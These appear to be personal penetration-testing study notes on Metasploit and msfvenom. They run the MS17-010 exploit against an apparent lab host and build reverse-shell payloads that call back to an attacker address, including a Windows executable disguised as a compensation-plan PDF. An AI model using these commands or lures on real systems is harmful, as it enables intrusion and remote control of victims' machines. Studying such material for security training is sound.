Monty's Pentesting Notes | Obsidian

    Metasploit

    apt update

    apt install metasploit-framework

    Table of Contents

    MSFconsole

    >msfconsole
    search for our target application with the search exploit command
    after found exploit, use it by copying the full name of it and using USE to use it:

    msf6 > use exploit/windows/smb/ms17_010_psexec

    Before we can run the exploit, we need to configure its options. To view the options available to configure, we can use the show options command:
    >Set LHOST to tun0
    Once we have both options set, we can start the exploitation. However, before we run the script, we can run a check to ensure the server is vulnerable:

    msf6 exploit(windows/smb/ms17_010_psexec) > check

[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.

    Lastly, type run or exploit

    MSFvenom

    list all venom payloads

    > msfvenom -l payloads

Framework Payloads (592 total) [--payload <value>]
==================================================

    Name                                                Description
    ----                                                -----------
linux/x86/shell/reverse_nonx_tcp                    Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp_uuid                    Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_ipv6_tcp                       Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp                            Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x86/shell_find_port                           Spawn a shell on an established connection

    Staged V.S. Stageless Payloads

    • Staged
      E.g. payload will send a small stage that will be executed on the target and then call back to the attack box to download the remainder of the payload over the network, then executes the shellcode to establish a reverse shell
    • Stageless
      beneficial if no access to much bandwidth and latency, where staged would have an unstable shell. Sometimes better for evasion purposes due to less traffic passing over the network to execute the payload

    In MSFVenom, we can distinguish staged and stageless payload through the name, in staged it is seperated by /, in stageless, it is pressed together by _.
    E.g. windows/meterpreter/reverse_tcp and windows/meterpreter_reverse_tcp. The former is a Staged payload.

    Building a payload

    linuw x64 reverseshell stageless

    >msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes

    windows stageless reverseshell

    >msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes